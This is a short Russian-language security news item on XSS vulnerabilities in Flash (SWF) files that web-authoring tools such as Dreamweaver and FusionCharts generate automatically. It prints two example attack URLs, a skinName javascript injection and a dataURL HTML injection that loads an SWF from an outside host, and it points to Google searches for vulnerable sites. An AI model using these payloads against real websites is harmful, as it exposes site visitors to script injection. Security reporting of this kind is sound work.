Критические уязвимости существуют в ряде популярных программ вэб-верстки, автоматически генерирующих файлы Shockwave Flash (SWF). Например Adobe Dreamweaver, Adobe Аcrobat Connect (ранее известная как Macromedia Breeze), InfoSoft FusionCharts, Techsmith Camtasia... Пробелы в безопасности программ делают сайты, содержащие созданные ими SWF, уязвимыми для XSS-атак. Составленый определенным образом запрос гугл покажет нам массу уязвимых "флэшек" (за подробностями идем на форум).

Программы вэб-верстки, генерирующие SWF-файлы автоматически, вставляют идентичный уязвимый ActionScript в созданный SWF. Уязвимыми являются практически все программы, имеющие одним из пунктов меню "save as SWF", "export to SWF" и т.п.

Наиболее поздо (в декабре) исправления были сделаны в Аdobe Dreamweaver, потому каснемся его поподробнее (то есть страницы, созданные более ранними версиями программы - уязвимы). Параметр "skinName", поддерживаемый всеми флэш-файлами создаными с помощью фитчи "Insert Flash Video", может быть использован для того, чтобы заставить жертву загрузить произвольный УРЛ (например http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//).

Так же к примеру параметр "dataURL", создаваемый прогой InfoSoft FusionCharts, позволяет инъекцию произвольного HTML-кода в объект "TextArea". Это дает атакующему возможность загрузить SWF с другого домена (например http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E) - исправлено в версии софта от 2 сентября 2007.